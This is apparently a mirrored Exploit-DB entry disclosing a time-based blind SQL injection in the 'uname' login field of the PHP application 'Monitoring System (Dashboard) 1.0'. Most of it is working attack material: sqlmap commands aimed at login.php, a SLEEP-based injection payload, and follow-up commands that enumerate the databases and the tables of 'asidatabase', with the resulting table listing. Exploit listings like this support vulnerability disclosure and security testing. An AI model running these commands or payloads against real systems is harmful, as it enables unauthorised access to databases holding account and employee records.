Monitoring System (Dashboard) 1.0 – ‘uname’ SQL Injection

  • 作者: Richard Jones
    日期: 2021-03-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49639/
  • # Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
    # Exploit Author: Richard Jones
    # Date: 2021-01-26
    # Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
    # Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
    # Version: 1.0
    # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
    
    Steps. 
    
    1. Run sqlmap
    "sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch
    
    2. 
    Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin=
    
    
    Exploit paths: 
    
    Database: 
    sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs
    
    Tables: 
    sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables
    [11 tables]
    +------------+
    | accounts |
    | attendance |
    | contacts |
    | employee |
    | gallery|
    | msexcel|
    | msppt|
    | msword |
    | oic|
    | random |
    | sign |
    +------------+